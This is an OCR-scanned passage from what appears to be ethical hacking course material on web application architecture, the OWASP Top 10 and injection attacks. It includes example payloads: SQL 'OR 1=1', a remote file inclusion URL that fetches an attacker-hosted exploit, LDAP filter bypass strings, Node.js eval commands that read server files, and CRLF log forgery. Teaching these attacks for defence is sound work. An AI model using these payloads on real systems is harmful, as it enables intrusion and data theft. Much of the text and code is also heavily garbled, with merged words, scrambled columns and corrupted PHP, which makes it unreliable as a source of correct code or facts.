attackssuchas SQL cross-sitescripting,andsession hijacking.
injection,
How WebApplications Work
Themain function
of webapplications
is to fetchuser-requested
datafroma database.
Whena
user clicksor enters a URLi n a browser,
the web application
immediately
displays
the
requested
websitecontent in thebrowser.
involvesthe following
Thismechanism steps:
First, the user enters the websitename or URLin the browser.Then,
the user'srequest
is sent to theweb server.
(Onreceivingthe request,theweb server checksthefile extension
© If the user requestsa simple
web pagewith an HTM or HTMLextension,the web
server processesthe request
andsendsthefile to theuser'sbrowser.
© Ifthe
server user
requests
side,
the request.
with
extension
needs
suchas php,processed
a webpage an
asp, andcfm,thentheweb application
that
server
to be at the
must process
Therefore,
the web server passesthe user'srequest to the web applicationserver,
whichprocesses theuser'srequest.
or server
Theweb application then accesses the databaseto perform the requested task
byupdatingretrieving theinformationstoredon it.
After processing
the request,the web application server finally
sendsthe resultsto the
web server,whichin turn sendstheresultsto the user'sbrowser.
ical andCountermensores
Mackin ©by E-Comel
Copyright
TEE eetscr team news were 1a 6329
16.1:Working
Figure ofwebapplications
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
Architecture
WebApplication
Architecture
Webapplications
etc.)
run on webbrowsers
scripts(HTML,
andclient-side
the web application
depends
andset
etc.)
JavaScript,
use a of server-side
scripts
to execute the application.
on its architecture,
Theworking
of
Ci,Ruby,
(Java,
whichincludeshardwareand softwarethat
PHP,
performtaskssuchas reading
the requestas well as searching,
gathering,
and displaying
the
required
data
Theweb application architectureincludesdifferent devices,web browsers,
andexternalweb
services thatworkwithdifferent
scriptinglanguages to execute theweb application.
It consists
of threelayers:
1.
or
Client presentation
logic
2. Business layer
layer
layer
3. Database
Theclientor presentation layerincludesall physical devicespresent on the clientside, suchas
laptops, smartphones, andcomputers. Thesedevicesfeatureoperating systems andcompatible
browsers, whichenableusersto sendrequests forrequired web applications.Theuser requests
a websitebyentering a URLi n the browser, andthe request travelsto theweb server. Theweb
server then responds to the requestand fetches the requested data;the application finally
displays
The “business
a
this responsei n the browseri n the formof web page.
logic―
layeritselfconsists of two layers: the web-server logiclayer and the
business logiclayer. Theweb-serverlogic layer contains various components suchas a firewall,
an HTTPrequest parser,a proxycaching server, an authenticationandlogin handler, a resource
handler, and a hardwarecomponent, e.g.,a server. Thefirewallofferssecurity to the content,
the HTTPrequest parser handlesrequests comingfromclientsand forwardsresponses to them,
Module4 1717
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
and the resource handleri s capableof handling
multiple simultaneously.
requests Theweb-
layercontains codethat readsdatafromthe browserand returns the results(e.g.,
server logic
IISWebServer, Apache WebServer).
The businesslogiclayerincludesthe functional logicof the web application, which is
implemented usingtechnologies suchas .NET,Java,and“middleware―.
It definesthe flow of
data,according to whichthe developerbuildsthe application
usingprogramming languages. It
stores the application
dataandintegrates legacyapplications
withthe latestfunctionalityof the
application.The server needsa specific to access user-requested
protocol data from its
database. Thislayercontainsthesoftwareanddefinesthe stepsto searchandfetchthedata
The databaselayer consists of cloud services, a 828 layer
that holdsall the commercial
transactions,and a databaseserver that supplies an organization's
production data in a
structured form(e.g.,
MS SQLServer, MySQL server).
ren
14.2:Web
Figure
Application
Architecture
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebServices
(©.
software
tothats
deployed
standard
Awebservice isan applation
or
messaging
sch as SOAP,UDD),WSDL,a ndREST enable
over he Interneta nd wes
communication
between applations fore
developed
protocols
Web
‘Types
of Services WebServiceArchitecture
© SORP
web services
(eResThuw ebservices
1 tesbssed ona at ofconse sng tte.
WebServices
Aweb service is an application
or softwarethat is deployed over the Internet.It usesa standard
messaging protocol (suchas SOAP) to enablecommunication betweenapplications developed
on different platforms.
For instance,Java-based services can interact with PHPapplications.
web-basedapplications
‘These are integratedwith SOAP, UDDI,WSDL, and RESTacross the
network.
WebServiceArchitecture
web service
‘A architecturedescribesthe interactions amongthe service provider,
service
Theseinteractions consistof threeoperations,
andservice registry.
requester, namely
publish,
find,andbind.All theserolesand
software (services)
modules andtheir descriptions. operations
work together
on web service artifactsknownas
=
ServiceProvider:Itis
ServiceRequester:
platform
It is an
a application are
fromwhereservices provided.
seeking
or clientthat is a service or trying
to
establishcommunication with a service. In general,
the browseris a requester, which
invokesthe service
It is the
ServiceRegistry:
on
of provider descriptions.
behalf
place
wherethe
a user.
loadsservice The
discoversthe service and retrieves binding
service requester data from the service
descriptions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘There in a webservice architecture:
are threeoperations
Publish:During service descriptions
thisoperation, are published
to allowthe requester
to discoverthe services.
Find:Duringthisoperation,
the requester tries to obtainthe service descriptions.This
operationcan be processed i n two different phases: obtaining the service interface
description
at development
time andobtainthe binding andlocation descriptioncallsat
run
time.
Bind:During thisoperation, the requester
callsandestablishes communication with the
services during r un time, usingbindingdatainsidetheservice descriptions
to locateand
invokethe services.
‘There
are two artifactsi n a web service architecture:
-5).
Service
Registry
(Contains
Service
Description)
<
@s
Service
‘a
Requester Service
Serica
Provider
(contains
‘Service
ed
Descriptions).
14.3:WebService
Figure Architecture
Characteristics
of WebServices
XML-based:Web services use XML for data representation
and transportation.
XML
usagecan avoid0S,networking, or platform binding. that provide
Applications web
services are highly
Coarse-grained
interoperable.
service: In web services, some objects
contain a massive amount of
information functionality
and offergreater thanfine-grained
services. A coarse-grained
service multiple
is a combination
of fine-grained
services.
Loosely
coupled: Webservices supporta loosely
coupled approach for interconnecting
can occur via the web API bysending
The interaction betweenthe systems
systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
XMLmessages. ThewebAPIincorporates ofabstraction
a layer forthe infrastructure
to
makethe connection flexibleandadaptable.
‘Asynchronous
and synchronous Synchronous
support: services are calledbyusers who
whereasasynchronous
wait for a response, servicesare calledbyusers whodo not wait
for a response.RPC-based anddocument-based
messages messagesare often usedfor
synchronousand asynchronous web services. Synchronousand asynchronous
endpoints
are implemented usingservlets,SOAP/XML,
andHTTP.
RPCsupport:Webservices support calls(RPC)
remote procedure to traditional
similarly
applications.
Types
of WebServices
Webservices are of two types:
=
SOAPwebservices
The Simple ObjectAccessProtocol(SOAP) definesthe XML format.XML is usedto
transferdata betweenthe service provider
andthe requester.It alsodeterminesthe
procedure to build web services and enablesdata exchange between different
programming
languages.
RESTful
webservices
Representational State Transfer(RESTful)
web services are designedto makethe
more productive.
services Theyuse many underlying HTTPconcepts to define the
services. Itis an architectural ratherthan a protocol
approach likeSOAP.
ofWebServiceArchitecture:
Components
UDDI:UniversalDescription,
=
Discovery,
listsallthe servicesavailable.
andIntegration(UDDI) is a
directory
service that
features/components
Thereare other important of theweb service architecture,
suchas WS:
Work Processes, WS-Policy,
and WS Security
Policy,
which playan importantrole in
communication betweenapplications.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Stack
Vulnerability
‘Custom
Web
Applications:
‘Third-party
Components.
Fa
3
“ectWerbiis
‘Open
Source / Commercial
‘Web
Server / HS
‘Apache
Microsoft
=
og sen
e re /08%
inn
onset
outer Ste
Secu 175/105
Vulnerability
Stack
Onemaintains and accesseswebapplications throughvarious levelsthat includecustom web
applications,third-partycomponents, databases, web servers, operating systems, networks,
andsecurity.
security
or services employed
All the mechanisms
the web application securely.
Whenconsidering
as a criticalcomponentbecause
at eachlayer
web applications,
web applications
enable the user to access
the organization considers
are majorsources of attacks.The
vulnerability
stackshowsvarious layers andthe correspondingelements/mechanisms/services
‘that
make
web
applications
vulnerable.
Web Applications
‘Custom B, oper Tectia! Wane
ThComponent
Web
pr
Server
(¢
ayers
wes ease
/
‘Apache
meet
IS
Microsot
/ /05
04
iz ayer @i
Operating
System Windows
nus x
aBE]
=
security ey
1
/
outer Switch
ws /105
yer
18.4:Vulnerability
Figure Stack
ical andCountermensores
Mackin ©by E-Comel
Copyright
exploit
Attackers thevulnerabilities
of one or more elementsamongthe seven levelsto gain
unrestrictedaccess to an application
or the entire network
layer?
If an attackerfindsvulnerabilities logic
in thebusiness (implemented usinglanguages
suchas .NETand Java), he/she c an exploit
thesevulnerabilitiesbyperforming
input
validationattackssuchas XS.
Layer 6
Third-party components are services that integratewith the websiteto achievecertain
functionality(e.g.,
Amazon.comtargeted byan attackeris the main website;citrix.com
website).
is a third-party
ical andCountermensores
Mackin ©by E-Comel
Copyright
layer1
IDSand IPSraise alarmsif any malicioustraffic enters a targetmachineor server.
adoptevasion techniques
‘Attackers to circumvent suchsystemsso that they do not
triggeranyalarmwhile exploiting
the target.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Application
‘Web Concepts
——_——_=S=—
Woo Applicaton
Web
Threats API,
Application Webhooks,
e—————_=_[
Web
DPE weno
| Application
‘Web Security
7
—
Web Application
Threats
Attackers attempt various application-level attacks to compromise the securityof web
applicationsto commit fraudor stealsensitive information.Thissection discusses
the various
typesof threatsandattacksagainstthe vulnerabilitiesof webapplications.
ical andCountermensores
Mackin ©by E-Comel
Copyright
OWASP
Top10Application Risks 2017
Security -
CEH
Kl ietion KG Security
Misconfigration
‘Broken
Authentication
ros ite (XS)
Serpting
ML ExtrmalEntity
OE) Using withKnown
Components
Vulnerabilities,
‘Broken
AccessControl InsuicentLogging
and
Monitoring
OWASPTop10 Application
Security
Risks 2017 -
Source:https://www.owasp.org
i s an international
OWASP that specifies
organization the top 10 vulnerabilities
and flawsof
‘web
applications.
ThelatestOWASP
A1~Injection
top10
application
security
risks
are
as follows:
‘A2—
BrokenAuthentication
functionsrelated to authenticationand session management
Application are often
implemented
incorrectly,
thereby allowing passwords,
attackersto compromise keys,or
session tokensor to exploit
other implementation
flawsto assume identitiesof other
users
-
(temporarily
or
A3 SensitiveDataExposure
permanently).
as special
transit, wellas
precautions whenexchanged withthe browser.
ical andCountermensores
Mackin ©by E-Comel
Copyright
XMILExternal
‘Ad Entity(XXE)
Many older or poorlyconfigured XML processors evaluateexternalentityreferences
withinXML documents. Externalentities can disclose internal filesusingthe file URI
handler,internalSMBfile shareso n unpatched Windowsservers, internalportscanning,
remotecodeexecution,andDoSservice attacks suchas the billionlaughs attack.
Broken
‘AS
~
Access Control
Restrictionson whatauthenticatedusersare allowedto do are not properly enforced.
Attackers can exploit theseflawsto accessunauthorized functionalityand/or data,such
as accessing other users’
accounts, viewingsensitive files,modifying data,
other users’
andchanging access rights
Security
‘AG
~
Misconfiguration
Securitymisconfiguration is the most common issuei n websecurity, whichis due in part
to manual or ad hoc configuration (or no configuration at all),i nsecure default
configurations, open $3 buckets,misconfigured HTTP headers,error messages
containing sensitive information, and not patching or upgrading systems, frameworks,
dependencies, andcomponents inatimely manner (orat all),
[AT Cross-Site
—
Scripting (XSS)
XSSflawsoccur wheneveran application includesuntrusteddata i n a new web page
without propervalidationor escaping, or wheneveri t updates an existing web pagewith
user-supplied data usinga browserAPI that can create JavaScript. XSSallowsattackers
to execute scriptsin the victim'sbrowser, which can hijackuser sessions,deface
or the
websites,redirect user to malicious
InsecureDeserialization
‘AB
~
sites.
Insecuredeserializationflaws occur when an application receives hostile serialized
objects.Insecure deserialization leadsto remote codeexecution. Even if deserialization
flaws do not result in remote code execution, serializedobjects c an be replayed,
tampered with,or deleted to spoof users, conduct injectionattacks, and elevate
privileges.
‘A9Using
—
ical andCountermensores
Mackin ©by E-Comel
Copyright
Al -
Flaws
Injection
laws
(©Injection
partof3 command
ae webaplication
or query
vulnerabilities
thatallowuntrusteddatatoe interpreted
andexecutedat
Aracers
(©
exploit
injection
malcous
denial queies
data
loss
ae
flaws
byconstructing
arruptin, lackofaccountablty,
or of access,
commands
or that resulta
in
legacy
code,
(©Injection
often
w e are prevalent
‘dscoveed
foundi n SQL,
scanners and
byapletion vulnerabilty furzers
LDAP,XPathqueries, andso. andcanbeeasy
s9u
arian | Hitoies
Sa
the nectionof maliious queriesinto user inputforms
code
aweb
|) ©teinvves theinjectionof malicious through application
Injection |
(©©"
IeinvoWves
the
nection
LDAP ofmalicious
\o statements
Al -
InjectionFlaws
flawsare webapplication
Injection vulnerabilitiesthatallowuntrusteddatato be interpreted
andexecutedas partof a commandor query.Attackersexploit flawsbyconstructing
injection
malicious commands lackof accountability,
or queriesthat resulti n datalossor corruption, or
denialof access. Suchflawsare prevalent i n legacycodeandoften found i n SQL, LDAP, and
XPathqueries.They can beeasily discovered byapplication vulnerability
scannersandfuzzers.
Attackers inject malicious
c ode, commands, or scriptsin the inputgatesof flawedweb
applications suchthat the applicationsinterpretand run the newly suppliedmaliciousinput,
whichi n turn allowsthemto extract sensitive information. Byexploiting flawsi n web
injection
applications,
attackerscan easily
read,write, delete,
and update any data (ie, relevantor
irrelevant
to that
are discussed
below: particular
application).
There some
of
are many typesof injection
flaws, which
*
SQLInjection:
SQLinjection
is the most common websitevulnerability
on the Internet,
andit is usedto take advantageof non-validated
inputvulnerabilitiesto passSQL
commands through a web applicationfor execution bya backenddatabase.In this
technique,
the attackerinjectsmalicious
SQLqueriesinto the user inputformeitherto
gain unauthorizedaccess to a databaseor to retrieve informationdirectly
from the
database.
Command Attackersidentify
Injection: an inputvalidation
flaw in an application
and
exploit
supplied amalicious
injecting
arbitrarycommand
the vulnerability
by i n the application
commandso n the host operatingsystem.
to execute
Thus,suchflawsare
extremely
dangerous.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LDAPInjection: LOAPinjectionis an attack methodi n whichwebsites that construct
LDAPstatementsfromuser-supplied inputare exploited
for launchingattacks.Whenan
applicationfailsto sanitize the user input, the attackermodifiesthe LDAPstatement
with the helpof a local proxy. This, i n turn, resultsi n the execution of arbitrary
commands suchas granting a ccess to unauthorizedqueriesand altering the content
insidethe LOAP tree.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacks
SQLInjection
¢|
1 of SOL
queries
non us series matous to eet nase
apoio
erable
cry
messes
and
ect
web to pana oti acs to oad
°>|ed
e °
cou
ee
SQL Attacks
Injection
SQLinjectionattacksuse a series of maliciousSQLqueries or SQLstatements to directly
manipulate
thedatabase. ApplicationsoftenuseSQLstatementsto authenticate
users,validate
rolesand accesslevels,
store and retrieve informationfor the application
anduser, andlink to
other data sources. SQLinjectionattackswork becausethe application doesnot properly
validatethe inputbefore passingit to an SQLstatement. Forexample, considerthe following
SQLstatement:
SELECT * FROMtablename WHEREUserID= 2302
the following
becomes SQLinjection
with a simple attack
SELECT* FROMtablename WHEREUserID= 2302 OR
Theexpression
1=1―
“OR evaluatesto the value“TRUE,―
oftenallowing the enumeration of all
user ID valuesfrom the database.An attackeruses a vulnerableweb application
normalsecurity m easures andobtaindirect accessto valuable
data.Attackers
to bypass
carryout SQL
injectionattacksfromthe webbrowser'saddressbar,formfields, queries, searches,
andso on
SQLinjection attacksallowattackers
to
Log into the application
without supplying
validcredentials
=
data i n the database,
Performqueriesagainst often even datato whichthe application.
normally
would not haveaccess
Modify
databasecontents or drop altogether
the database
Usethe trust relationships
establishedbetweenthe web application
components
to
otherdatabases
access
ical andCountermensores
Mackin ©by E-Comel
Copyright
> Internet
Figure
14.5:SOL attack
Injection
‘a Serve
code
njecion waa
complete
Note: For coverageof SQLinjection and techniques,
concepts refer to Module 15
SQLInjection.
ical andCountermensores
Mackin ©by E-Comel
Copyright
CommandInjection
Attacks
Injection
|©Diagnosis.
System
AP Runtime
Process
Shlijectionfenton elude system),
sar) ands
StartProceal
valane
commands
exe,
ML
‘utpt without ccd
being or HIM codeor serptng,
©
wlth| iteyrey omtoneae nine root
CommandInjectionAttacks
Command injectionflawsallowattackersto passmaliciouscodeto differentsystems via web
applications.
Theattacksinclude callsto an operatingsystem over systemcalls,u se ofexternal
programsover shell commands, and callsto backenddatabasesover SQL.Scripts in Perl
Python,and otherlanguages execute and insert poorly designed webapplications. If a web
applicationusesanytypeof interpreter,attackersinsert malicious damage
codeto inflict
To perform various functions,web applications must use operating systemfeaturesand
externalprograms.Although manyprogramsinvokeexternally, a frequently
usedprogramis
the sendmailprogram. Carefully
scruban application
before passing a piece of information
through
an HTTPexternal
commands,
passesthesecharacters
attackers
Otherwise,
request. can
insert
special
and commandmodifiersinto the information.Theweb application
to the external system for execution. Inserting
malicious
characters,
then blindly
SQLcommands is a
dangerous practice and rather widespread,as it is a commandinjection method.Command
attacksare easyto carry out anddiscover,
injection but theyare difficultto understand.
Thefollowing
are some typesofcommand attacks:
injection
=
ShellInjection
© Anattackertries to craftan inputstringto gain shella ccessto a webserver
Shell injection functions include system(), StartProcess(),
Java. lang. Runtime. exec(), System.Diagnostics.Process.Start(), and
similar
APIs
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
HTML
Embedding
‘This
websites
virtually.
type of attackis usedto deface
addsextra HTML-based
Usingthisattack,an attacker
content to the vulnerableweb application
© embedding
In an HTML attack,placed
the user inputto a webscripti s into the
+
File
HTML
output
Injection
without
beingchecked
for HTMLcodeor scripting
© exploits
Theattacker thisvulnerability
andinjectsmaliciouscodeinto system
files
http: //wew.certifiedhacker.com/vulnerable.php?COLoR=http:
//evi
L/exploit?
ical andCountermensores
Mackin ©by E-Comel
Copyright
CommandInjection
Example
CommandInjectionExample
attackerenters the following
‘An maliciouscode(account number)with a new password,
A
codeinjecion
tes com
24.6: example
Figure Command
injection attack
Module4 1734
Page
©
by ical andCountermensores
Mackin Copyright E-Comel
File Injection
Attack
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Vulnerable
PHPcode:
<?php
Sdrink
Af
=($_GET['DRINK']
(Asset
;
‘coke!
) )
=§_GET[‘DRINK'];
Sdrink
.
require( §drink '.php’
)
>
To exploitthe vulnerable phpcode,the attacker injectsa remotelyhostedfile at
www.jasoneval.com,
whichcontainsan exploit.
Exploit
code:
http://www php?DRINK=http://jasoneval.com/exploit?
certifiedhacker.com/orders.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacks
LDAP Injection
"©LOA?ovrectryServices
store and
organsntrmation basedon ts i herrehically
attibve, T h einformation
inictonmodel, using
ters
{©LoAP basedonthecent server andcentscan search
through
dretoryentries
LOAP
fers
SL nctionattacks,b ut expt user parameters
t to generatean LOAP
query
to LDAP
tree
techniques
LDAP injection tae advantage
of non vadatedwebapplicationInputvlnerablities
an pass
‘ued
or searching
rectory Services ec
t oobtain access databases Behindom
an is quar
Tetestf appiation vlnerabeto LOAPcode jection,senda othe rer thatgenerates
the LDAPserverretune an ero, lca beexploited
with codejection techngues
an nv inp
Login
‘Account
= 1p Uamame [coca]
LDAPInjection
Attacks
LDAPDirectory
Services
store andorganize informationbasedon its attributes.Theinformation
is hierarchically
organized as a tree of directory
entries. TheLightweight Directory Access
Protocol(LDAP) model,andclientscan searchthe directory
is basedon the client-server entries
using
filters.
Module4 1727
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
An LDAPinjection attackworksin the same wayas an SQLinjection attack,but it exploits
user
parameters to generate a n LOAP protocol
query. It runs on an Internet transport suchas TCP,
andit is an open-standard formanipulating
protocol andqueryingDirectory Services.An LDAP
injectiontechnique is used to take advantage of non-validatedweb application input
vulnerabilitiesto passLDAPfiltersusedforsearching Directory to obtaindirecta ccess
Services
to databases behindan
LDAPattacksexploit
LDAP
tree.
web-basedapplications constructedbasedo n LDAPstatements usinga
localproxy.Webapplications mayuse user-supplied inputto create custom LDAPstatements
for dynamic web pagerequests. Attackerscommonly perform LDAPinjection attackson web
applications employinguser inputs to generateLDAPqueries.Theattackerscan use the search
filter attributesto discoverthe underlying LOAPquery structure. Usingthis structure,
the
attackerincludes additionalattributesin the user-supplied
inputto determinewhetherthe
application is vulnerable
to LDAPinjection andevaluatestheweb application'soutput.
Depending
o n the implementation
of thetarget,
attackersuse LDAPinjection
to achieve
=
Loginbypass
=
Information
disclosure
=
+
Privilege
escalation
Informationalteration
Example:
To test if an application is vulnerable
to LDAPcode injection, senda query to the server that
generates an invalid input.If the LDAPserver returns a n error, it can be exploited
with code
techniques.
injection
AccountLogin
{[
username cortifiedhacker(4))
Password [blah
Figure
LDAP
14.8:
injectionattackexample
If an attackerenters a valid username “certifiedhacker" and injectscertifiedhacker)(&)),then
the URLstring becomes (&(USER=certifiedhacker)(&))(PASS=blah)). TheLOAPserver processes
onlythe first filter;onlythe query (&(USER=certifiedhacker)(&)) is processed.Thisquery is
always true,andtheattackerlogs into the systemwithout a valid password
An important defensemethodagainst suchattacks
i s to filterall inputs to the LDAP;
otherwise,
vulnerabilitiesin LDAPallow the execution of unauthorizedqueriesor modificationof its
contents. Whenthe attacker modifies the LDAPstatements,the process runs with the same
permissions as the component of theweb application that executedthe command.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Other Injection
Attacks
Inject
Includes ajo
Ani ee thee whet
|
injection
‘Template
tog
Injection o cnenveeted nt
CRLFInjection |
Other InjectionAttacks
Someothertypesof injection
attacksare discussed
below:
Server-Side JSInjection
Server-side
JavaScript
injections thatmanifestwhenan application
are vulnerabilities
user-controllable
integrates dynamically
valuesinto a stringthat the code interpreter
validates.Attackersexploit
improper
alter the codethat will be compiled
validationof user dataandpass randomvalues
andexecutedbythe server. Thesevulnerabilities
alsoallowattackersto compromise the functionality anddataof the applications
to
hosted
bythe server. Attackerscan alsouse the server as a source to launchfurtherattackersi n
the target network.
ofserver-side
Example JavaScript
injection:
can launch
‘Attackers a DoSattackbypassing function:
to the eval()
commands
while (1)
Thiscommand forcesthe server's event loop
to use the complete time and
processer
restrictsit fromevaluatingadditionalinputsuntil the processis reinitiated.
content fromthe server. Thefollowing
Attackerscan alsoreadthe files’ commands
can
the content ofthecurrent andparentdirectories:
display
res.end(require(‘fs’) .readdirsyne('.’) toString())
res.end(require (‘fs’)
.readdirsyne(‘..’).toString())
the file names,attackerscan passthe following
After retrieving commandsto readthe
content insidethe file:
ical andCountermensores
Mackin ©by E-Comel
Copyright
res.end(require(‘fs’)
Thisvulnerability
.readFileSync
(filename)
by
)
andmalicious
binary
files
further initiating running
can be exploited
Server-Side
£s
usingthemodules and child process
IncludesInjection
Server-side Includesis an application
featurethat helps designers the
to auto-generate
content ofthe webpagewithoutmanual involvement. allowdevelopers
The# directives
to perform Thesedirectivesc an be files,
this activity. CGIvariables,
shellcommands,
etc.
Afterevaluating allthedirectives,
HTML is delivered to the requester.
Typical
directives
include:
<!_ Hinclude virtual= “/footer.html―
-->
<!__Hechovar= “DATE_LOCAL―
-->
Template
Server-Side Injection
While creatingdynamicpages,designersor developers
use template engines to
segregate
programminglogic Thus,
fromdatapresentation. insteadof storing
codethat
accepts andextracts therequired
requests information
fromthe databaseandpassingit
to users in monolithicdata file,template
enginesare employed the
to segregate
ofthedatafromthe remaining
presentation
template
Server-side
code
that
evaluatesi t
injectionoccurs when users are allowedto insert unsafeinputs
template.
into a server-side Whenthisvulnerability exists,attackerscan inject malicious
template directives
to run arbitrarycodeandgaincomplete controlover the targetweb
server. Thisinjectionis similarto XSSbut is often employed to targetserver internals
andachieveremote code execution,making every vulnerableapplication a primary
target.Templateinjectionmanifestsv ia designers’
codeerrors anddeliberatetemplate
whileshowcasing
disclosure richfeatures ofapplications,
blogs, etc.
Forexample,considerthe followingcomplex PHPandHTMLcode:
<html>
<head>
<title>((title}}</title>
</head>
<body>
<form method =
“{{method}}―
action =
“{{action}}">
ical andCountermensores
Mackin ©by E-Comel
Copyright
<input type
=
“text―
==
n ame
</p>
</body>
</html>
Replace codeusingtemplate
the abovementioned enginesasfollows:
StemplateEnginenew TemplateEngine
=
=
(); ;
Stomplate $templateingine-> loadFile (‘signUp. tpl’)
Stemplate-> assign(‘title’, ‘login’);
Stomplate-> assign(‘method’,
$template-> assign(‘action’ ; ‘post’)
‘Singup.php’)
Stomplate-> assign(
‘username’,
Stemplate-> assign(‘time’, ;
getUsernameFromCookie())
microtime(true));
Stemplate-> show();
Theabovementioned code is vulnerableto template injection
a s it can execute native
functions.if attackersare ableto attachtemplatefileswith suchexpressions,theycan
run
any
arbitrary to
LogInjection
the
function
to gainaccess targetwebserver.
Attackerslaunchloginjection
attacksbyexploiting
unsanitized
or unvalidatedinputs
to
application logs.
Applicationsusually
store a large numberof logs
suchas accesslogs,
transaction logs,
monitor logs,
exceptionor error logs,
GClogs,and crashlogs.If an
application failsto logusers’
or its administrator events or actions i n a secure manner,
attackerscouldinsert fake entries or recordsto corruptthe logfile. Attackersuse this
technique to insert misleading
informationi n the logfile forcoveringtheirtracksi n the
event of a successfulattack.
considera n application
Forinstance, that logs
datai n the following
format:
Date, Time, Username, ID, source IP, Request
Theunvalidatedinputparameterscome
directly
fromthe request
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
ideWalkin
username: xyz;
can manipulate
‘Attackers to save the logwith fakeinputs:
the id parameter
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
username: xyz;
id=\r\n
input)
(Fake
If
Forlog
fails
the the remainder
null bytes,
to escape
example,
ofthe stringis not recorded.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3;
username: xyz
id=400
User
query:
</n2>specialoffer
</a><h2>
<a href=www.certifiedhacker.com>malicious link
Resulting
pagefollowing
HTML injection:
<html>
<hi> Results matchingthe given query: </hi>
<h2></h2>special offer <a hrefswww.certifiedhacker. com>malicious
Link</a><h2></h2>
<ol> <li> Result A
<1i> Result B </ol>
</html>
However, the attacker aims to includeHTML code i n a pagethatotherusers visit. For
this purpose,codeinjection shouldbe includedin the pagecontent that is intendedto
beviewedbyend users. Theinjection o ccurs if applications
save untrusteduser inputs
and disclosedata to other users. For instance,a ssume that the abovementioned
application
consistsof a pageshowing the users’searchhistory:
Codesnippet(application
template) history
forsearch page
Module4 Page1762 ical andCountermensores
Mackin
©
Copyright
by E-Comel
<html>
<hi> Recent search history: </h1>
<ol> <1ipch2> (user_query_1) </h2>
<1ipcha> </h2></ol>
(user_query_2)
</html>
Resulting
searchhistory
page following HTMLinjection,
<html>
<hl> Recent search history: </hi>
<ol>
<1ip<h2> Top10 thriller movies </h2>
<1i>ch2></h2>special offer <a href=www.certifiedhacker.com>
malicious link</a><h2></h2>
</ol> </htmi>
Now,every searchresultlink that a user tries to access will displaya maliciouslink
generated
by
viewingthe content generated
thatpageare exfiltrated
usertothe
theattacker.I f any is attracted
fromattacker'sdomain,
to theattacker.
link andopensit, he/she be
and any credentialsenteredon will
CRLFInjection
Ina carriage return line feed(CRLF) attackersinjectcarriage return (\r)
attack,
injection
and line feed {\n)charactersinto the user'sinput to trick the web server, web
application,
or user into believing
that the current object
is terminatedanda new object
has
been initiated. is a vulnerabilitymanifests
injection
CRLF
CRLFcharactersinto an application.
differentInternet protocols,
Thesecharacterssignify that when
auser
enters
the
the end of the line for
which,when combinedwith HTTP request/response
headers,can lead to various vulnerabilitiessuchas HTTPrequestsmuggling and
responsesplitting,
HTTPrequestsmuggling can occur whenan HTTPrequesti s transmittedvia a server,
whichserves as a proxy to validateandforwardthe requestto the next server. Such
vulnerabilities
can alsoleadto furtherattacks
suchas cache
poisoning,firewallsecurity
breach,
andrequest hijacking,
In HTTP response splitting,
attackerscan includearbitrary HTTP headersfor the HTTP
response to split
the responseandbody. It resultsi n delivering instead
two responses of
whichcan leadto furthervulnerabilitiessuchas cross-sitescripting,
‘one,
Consider
the
following
thattheadmin
‘Suppose
example
panel log hasa
i n log
of CRLFinjection files:
filewiththe IP time andURLpathofthe visited
site as follows:
10.10.10.10 -
09:25 -
/index.php?page=about
ical andCountermensores
Mackin ©by E-Comel
Copyright
If an attackercan embedCRLFcharacters then he/she
into the HTTPrequest, c an
change
the outputflow and can enter fake logentries. Furthermore,the attackercan
alterthewebapplication a s follows:
response
/Andex.php?page=about
é40d¥0a127.0.0.1 -
09:25-
/Andex. php?page=about
érestrictedaction=edit
Here,80d and¥0aare CRandLFencodedcharacters.
Afterinjecting characters,
CRLF
the logentries appear as follows:
10.10.10.10 -
/index.php?page=abouté
09:25 -
127.0.0.1 =
/index.php?page=homesrestrictedaction=edit
09:25 ~
ical andCountermensores
Mackin ©by E-Comel
Copyright
2 -
BrokenAuthentication
(©tacks
can in
Impersonate
ners
exploit
users
authentication functions
or session management suchas
exposed
accounts,
Session
IDURLsPassword
‘Timeout
in
Exploitation Exploitation
= Q
A2- BrokenAuthentication
Authenticationand session management
includesevery aspectof user authenticationand
managementof active sessions. At present,web applications implementing solid
authenticationsfall becauseof weak credentialfunctionssuchas “change my password,―
“forgot
my password,― “remember “account
my password,― update,―and so on. Therefore,
developers must takethe utmost care to implementuser authenticationsecurely. It is always
better to use strongauthenticationmethodsthrough specialsoftware-and hardware-based
cryptographic tokensor biometrics.An attackerexploits
vulnerabilitiesin theauthenticationor
session management functionssuch as exposed accounts, session IDs,logout, password
management, timeouts, rememberme, secret question,account update, and others to
impersonate
users.
=
Session URLs
o
ID
in
Example:
web application
‘A creates a sessionID forthe respective loginwhena user logsinto
http: //certifiedhackershop.com. An attacker uses a sniffer to sniff the
cookiethat contains the sessionID or tricksthe user into gettingthe sessionID.The
http: enters
attackern ow the followingURLi n hisbrowser's
//certifiedhackershop.com/sale/saleitems=304;
addressbar:
jsessioni
2OMTOIDPXMOOQSABGCKLHCJUN2IV?dest=NewMexico
This redirectshim tologged
the already in page of the victim. The attacker
successfully
impersonatesvictim. the
ical andCountermensores
Mackin ©by E-Comel
Copyright
Exploitation
Password
Attackers can identifypasswords stored in databasesbecauseof weak hashing
algorithms. password
Attackerscan gainaccess to the web application's databaseif user
passwords are not encrypted, which allows the attacker to exploitevery user's
password.
TimeoutExploitation
If an application's
sessiontimeouts are set to longer durations,
the sessionswill lastuntil
the time specified,i.e., the session will be valid for a longerperiod. Whenthe user
closesthe browser without logging out fromsites accessedthrough a public computer,
the attackercan use the same browserlater to conductthe attack, as sessions IDs can
remain valid;thus,they c an exploit the user's
privileges.
© Example:
